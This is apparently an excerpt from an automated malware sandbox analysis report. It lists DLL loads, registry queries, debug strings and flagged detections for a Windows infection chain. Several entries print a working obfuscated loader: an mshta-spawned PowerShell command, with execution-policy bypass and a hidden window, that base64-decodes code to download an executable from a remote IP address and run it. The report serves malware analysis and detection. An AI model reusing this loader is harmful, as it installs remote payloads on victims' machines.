Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: winsqlite3.dll Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\tbzciNlUnTssWUCBrcdfRNsczFkueNnjnRaMnxhByRwbUvCzkHQ\7HLXbJFcuuGutQgrmx.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\tbzciNlUnTssWUCBrcdfRNsczFkueNnjnRaMnxhByRwbUvCzkHQ\7HLXbJFcuuGutQgrmx.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\tbzciNlUnTssWUCBrcdfRNsczFkueNnjnRaMnxhByRwbUvCzkHQ\7HLXbJFcuuGutQgrmx.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\tbzciNlUnTssWUCBrcdfRNsczFkueNnjnRaMnxhByRwbUvCzkHQ\7HLXbJFcuuGutQgrmx.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\tbzciNlUnTssWUCBrcdfRNsczFkueNnjnRaMnxhByRwbUvCzkHQ\7HLXbJFcuuGutQgrmx.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\tbzciNlUnTssWUCBrcdfRNsczFkueNnjnRaMnxhByRwbUvCzkHQ\7HLXbJFcuuGutQgrmx.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\backgroundTaskHost.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\backgroundTaskHost.exe Section loaded: twinapi.appcore.dll Jump to behavior
Source: C:\Windows\System32\backgroundTaskHost.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\backgroundTaskHost.exe Section loaded: mrmcorer.dll Jump to behavior
Source: C:\Windows\System32\backgroundTaskHost.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\backgroundTaskHost.exe Section loaded: biwinrt.dll Jump to behavior
Source: C:\Windows\System32\backgroundTaskHost.exe Section loaded: windows.staterepositorycore.dll Jump to behavior
Source: C:\Windows\System32\backgroundTaskHost.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\backgroundTaskHost.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\backgroundTaskHost.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\backgroundTaskHost.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\backgroundTaskHost.exe Section loaded: cdp.dll Jump to behavior
Source: C:\Windows\System32\backgroundTaskHost.exe Section loaded: wincorlib.dll Jump to behavior
Source: C:\Windows\System32\backgroundTaskHost.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\backgroundTaskHost.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\backgroundTaskHost.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\System32\backgroundTaskHost.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\backgroundTaskHost.exe Section loaded: dsreg.dll Jump to behavior
Source: C:\Windows\System32\backgroundTaskHost.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\backgroundTaskHost.exe Section loaded: windows.storage.applicationdata.dll Jump to behavior
Source: C:\Windows\System32\backgroundTaskHost.exe Section loaded: threadpoolwinrt.dll Jump to behavior
Source: C:\Windows\System32\backgroundTaskHost.exe Section loaded: logoncli.dll Jump to behavior
Source: C:\Windows\System32\backgroundTaskHost.exe Section loaded: windows.applicationmodel.background.timebroker.dll Jump to behavior
Source: C:\Windows\System32\backgroundTaskHost.exe Section loaded: windows.applicationmodel.background.systemeventsbroker.dll Jump to behavior
Source: C:\Windows\System32\backgroundTaskHost.exe Section loaded: windows.web.dll Jump to behavior
Source: C:\Windows\System32\backgroundTaskHost.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\backgroundTaskHost.exe Section loaded: windows.globalization.dll Jump to behavior
Source: C:\Windows\System32\backgroundTaskHost.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\backgroundTaskHost.exe Section loaded: bcp47mrm.dll Jump to behavior
Source: C:\Windows\System32\backgroundTaskHost.exe Section loaded: windows.security.authentication.web.core.dll Jump to behavior
Source: C:\Windows\System32\backgroundTaskHost.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\backgroundTaskHost.exe Section loaded: windows.services.targetedcontent.dll Jump to behavior
Source: C:\Windows\System32\backgroundTaskHost.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Windows\System32\backgroundTaskHost.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\backgroundTaskHost.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\backgroundTaskHost.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\backgroundTaskHost.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\backgroundTaskHost.exe Section loaded: cryptowinrt.dll Jump to behavior
Source: C:\Windows\System32\backgroundTaskHost.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\backgroundTaskHost.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\backgroundTaskHost.exe Section loaded: ncryptprov.dll Jump to behavior
Source: C:\Windows\System32\backgroundTaskHost.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\backgroundTaskHost.exe Section loaded: contentdeliverymanager.utilities.dll Jump to behavior
Source: C:\Windows\System32\backgroundTaskHost.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32 Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: Binary string: q8C:\Users\user\AppData\Local\Temp\y35p2qjs\y35p2qjs.pdb source: powershell.exe, 00000003.00000002.1565515176.0000000004CB6000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: ATBroker.pdb source: svchost.exe, 00000007.00000003.1767938286.000000000341B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1768041309.000000000342B000.00000004.00000020.00020000.00000000.sdmp, 7HLXbJFcuuGutQgrmx.exe, 0000000B.00000002.2696806857.00000000009CE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: smss.exe, 00000006.00000003.1557592765.0000000004560000.00000004.00001000.00020000.00000000.sdmp, smss.exe, 00000006.00000003.1557262259.0000000004700000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1800388098.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1702775205.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1800388098.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1700226963.0000000003700000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 0000000C.00000003.1803238497.0000000004D42000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 0000000C.00000002.2697687599.000000000508E000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 0000000C.00000002.2697687599.0000000004EF0000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 0000000C.00000003.1800364851.0000000004B95000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: smss.exe, 00000006.00000003.1557592765.0000000004560000.00000004.00001000.00020000.00000000.sdmp, smss.exe, 00000006.00000003.1557262259.0000000004700000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000007.00000002.1800388098.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1702775205.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1800388098.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1700226963.0000000003700000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 0000000C.00000003.1803238497.0000000004D42000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 0000000C.00000002.2697687599.000000000508E000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 0000000C.00000002.2697687599.0000000004EF0000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 0000000C.00000003.1800364851.0000000004B95000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ATBroker.pdbGCTL source: svchost.exe, 00000007.00000003.1767938286.000000000341B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1768041309.000000000342B000.00000004.00000020.00020000.00000000.sdmp, 7HLXbJFcuuGutQgrmx.exe, 0000000B.00000002.2696806857.00000000009CE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: 7HLXbJFcuuGutQgrmx.exe, 0000000B.00000002.2695980394.000000000012F000.00000002.00000001.01000000.0000000A.sdmp, 7HLXbJFcuuGutQgrmx.exe, 0000000D.00000002.2695984415.000000000012F000.00000002.00000001.01000000.0000000A.sdmp

Data Obfuscation
barindex
PowerShell case anomaly found
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c poWeRSHeLL.exe -Ex byPaSS -nop -W 1 -c dEvICecRedENtIaLdEPLoYmeNt.Exe ; iex($(iEx('[sysTEM.teXt.eNCoDInG]'+[ChaR]58+[chaR]58+'UtF8.geTsTrInG([syStem.ConvErt]'+[cHar]0x3a+[ChAR]0X3a+'fROmBaSe64sTRinG('+[chAr]34+'JHggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNQkVyRGVmaW5pVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQcm5YLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmd21FR1hFYW9CdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHgsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcFRLLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Q21MZyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAicFh0IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNQQUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBDeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR4OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMzIvNzAvc21zcy5leGUiLCIkRU52OkFQUERBVEFcc21zcy5leGUiLDAsMCk7U1RhUnQtc0xFRVAoMyk7aW52T2tFLWl0ZU0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxzbXNzLmV4ZSI='+[ChaR]34+'))')))"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poWeRSHeLL.exe -Ex byPaSS -nop -W 1 -c dEvICecRedENtIaLdEPLoYmeNt.Exe ; iex($(iEx('[sysTEM.teXt.eNCoDInG]'+[ChaR]58+[chaR]58+'UtF8.geTsTrInG([syStem.ConvErt]'+[cHar]0x3a+[ChAR]0X3a+'fROmBaSe64sTRinG('+[chAr]34+'JHggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNQkVyRGVmaW5pVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQcm5YLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmd21FR1hFYW9CdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHgsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcFRLLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Q21MZyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAicFh0IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNQQUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBDeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR4OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMzIvNzAvc21zcy5leGUiLCIkRU52OkFQUERBVEFcc21zcy5leGUiLDAsMCk7U1RhUnQtc0xFRVAoMyk7aW52T2tFLWl0ZU0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxzbXNzLmV4ZSI='+[ChaR]34+'))')))"
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c poWeRSHeLL.exe -Ex byPaSS -nop -W 1 -c dEvICecRedENtIaLdEPLoYmeNt.Exe ; iex($(iEx('[sysTEM.teXt.eNCoDInG]'+[ChaR]58+[chaR]58+'UtF8.geTsTrInG([syStem.ConvErt]'+[cHar]0x3a+[ChAR]0X3a+'fROmBaSe64sTRinG('+[chAr]34+'JHggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNQkVyRGVmaW5pVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQcm5YLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmd21FR1hFYW9CdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHgsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcFRLLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Q21MZyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAicFh0IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNQQUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBDeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR4OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMzIvNzAvc21zcy5leGUiLCIkRU52OkFQUERBVEFcc21zcy5leGUiLDAsMCk7U1RhUnQtc0xFRVAoMyk7aW52T2tFLWl0ZU0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxzbXNzLmV4ZSI='+[ChaR]34+'))')))" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poWeRSHeLL.exe -Ex byPaSS -nop -W 1 -c dEvICecRedENtIaLdEPLoYmeNt.Exe ; iex($(iEx('[sysTEM.teXt.eNCoDInG]'+[ChaR]58+[chaR]58+'UtF8.geTsTrInG([syStem.ConvErt]'+[cHar]0x3a+[ChAR]0X3a+'fROmBaSe64sTRinG('+[chAr]34+'JHggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNQkVyRGVmaW5pVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQcm5YLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmd21FR1hFYW9CdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHgsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcFRLLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Q21MZyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAicFh0IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNQQUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBDeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR4OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMzIvNzAvc21zcy5leGUiLCIkRU52OkFQUERBVEFcc21zcy5leGUiLDAsMCk7U1RhUnQtc0xFRVAoMyk7aW52T2tFLWl0ZU0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxzbXNzLmV4ZSI='+[ChaR]34+'))')))" Jump to behavior
Suspicious command line found
Source: C:\Windows\SysWOW64\mshta.exe Process created: "C:\Windows\system32\cmd.exe" "/c poWeRSHeLL.exe -Ex byPaSS -nop -W 1 -c dEvICecRedENtIaLdEPLoYmeNt.Exe ; iex($(iEx('[sysTEM.teXt.eNCoDInG]'+[ChaR]58+[chaR]58+'UtF8.geTsTrInG([syStem.ConvErt]'+[cHar]0x3a+[ChAR]0X3a+'fROmBaSe64sTRinG('+[chAr]34+'JHggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNQkVyRGVmaW5pVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQcm5YLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmd21FR1hFYW9CdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHgsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcFRLLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Q21MZyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAicFh0IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNQQUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBDeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR4OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMzIvNzAvc21zcy5leGUiLCIkRU52OkFQUERBVEFcc21zcy5leGUiLDAsMCk7U1RhUnQtc0xFRVAoMyk7aW52T2tFLWl0ZU0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxzbXNzLmV4ZSI='+[ChaR]34+'))')))"
Source: C:\Windows\SysWOW64\mshta.exe Process created: "C:\Windows\system32\cmd.exe" "/c poWeRSHeLL.exe -Ex byPaSS -nop -W 1 -c dEvICecRedENtIaLdEPLoYmeNt.Exe ; iex($(iEx('[sysTEM.teXt.eNCoDInG]'+[ChaR]58+[chaR]58+'UtF8.geTsTrInG([syStem.ConvErt]'+[cHar]0x3a+[ChAR]0X3a+'fROmBaSe64sTRinG('+[chAr]34+'JHggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNQkVyRGVmaW5pVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQcm5YLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmd21FR1hFYW9CdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHgsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcFRLLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Q21MZyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAicFh0IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNQQUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBDeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR4OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMzIvNzAvc21zcy5leGUiLCIkRU52OkFQUERBVEFcc21zcy5leGUiLDAsMCk7U1RhUnQtc0xFRVAoMyk7aW52T2tFLWl0ZU0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxzbXNzLmV4ZSI='+[ChaR]34+'))')))" Jump to behavior
Suspicious powershell command line found
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poWeRSHeLL.exe -Ex byPaSS -nop -W 1 -c dEvICecRedENtIaLdEPLoYmeNt.Exe ; iex($(iEx('[sysTEM.teXt.eNCoDInG]'+[ChaR]58+[chaR]58+'UtF8.geTsTrInG([syStem.ConvErt]'+[cHar]0x3a+[ChAR]0X3a+'fROmBaSe64sTRinG('+[chAr]34+'JHggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNQkVyRGVmaW5pVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQcm5YLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmd21FR1hFYW9CdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHgsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcFRLLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Q21MZyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAicFh0IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNQQUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBDeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR4OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMzIvNzAvc21zcy5leGUiLCIkRU52OkFQUERBVEFcc21zcy5leGUiLDAsMCk7U1RhUnQtc0xFRVAoMyk7aW52T2tFLWl0ZU0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxzbXNzLmV4ZSI='+[ChaR]34+'))')))"
